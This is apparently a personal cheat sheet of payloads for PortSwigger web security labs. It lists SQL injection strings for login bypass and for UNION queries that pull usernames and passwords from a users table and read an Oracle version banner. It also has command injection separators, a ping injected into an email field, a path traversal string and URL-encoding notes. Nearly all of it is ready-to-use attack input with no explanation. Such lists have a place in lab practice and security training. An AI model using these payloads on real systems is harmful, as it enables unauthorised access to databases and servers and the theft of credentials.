Burpsuit Portswigger Lab Solutions

admin'--     //Username input   
'+or+1=1--              Burp     [For + space or %20]
'+select+null,null,null --
'union+select+username,password+from+users--
'union+select+null,'Wq9f2g',1234--
'union+select+null,banner+from+v$version-- // Oracle DB
" or ""="
SELECT name, type FROM USERS WHERE name LIKE "%1"; SELECT * FROM USERS WHERE "%"="%";
'union+select+null,null||'~'||password+from+users--
@mail;ping+-c+10+127.0.0.1;                  @mail||ping+-c+10+127.0.0.1||    
../../../../



; ls  //Break's  prior command
& ls
&& ls
| ls
|| ls


```````````````````
URL ENCODING FUNCTION
[ ] Space = %20
+ = %2B
# = %23

https://portswigger.net/web-security/sql-injection/cheat-sheet
